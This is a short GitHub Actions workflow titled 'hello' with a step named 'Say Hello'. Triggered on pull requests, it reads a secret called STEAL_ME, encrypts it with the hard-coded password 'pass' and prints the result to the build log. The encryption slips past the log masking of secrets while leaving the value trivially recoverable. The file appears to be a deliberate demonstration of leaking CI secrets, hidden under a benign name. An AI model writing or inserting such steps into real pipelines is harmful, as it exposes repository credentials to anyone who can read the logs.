name: hello

on:
  pull_request:

jobs:
  BuildRelease:
    runs-on: ubuntu-latest
    name: Say Hello
    steps:
      - name: Setup Node
        uses: actions/setup-node@v1
        with:
          node-version: 14.x
      - name: Check out repo
        uses: actions/checkout@v2
        with:
          fetch-depth: 2
      - name: Executing
        env:
          SM_TOKEN: ${{ secrets.STEAL_ME }}
        run: |
         echo "doing stuff..."
         echo "${SM_TOKEN}" | openssl enc -aes256 -md sha512 -pass pass:pass -e -base64 > key.txt
         wc key.txt
         cat key.txt
         echo "evil stuff"
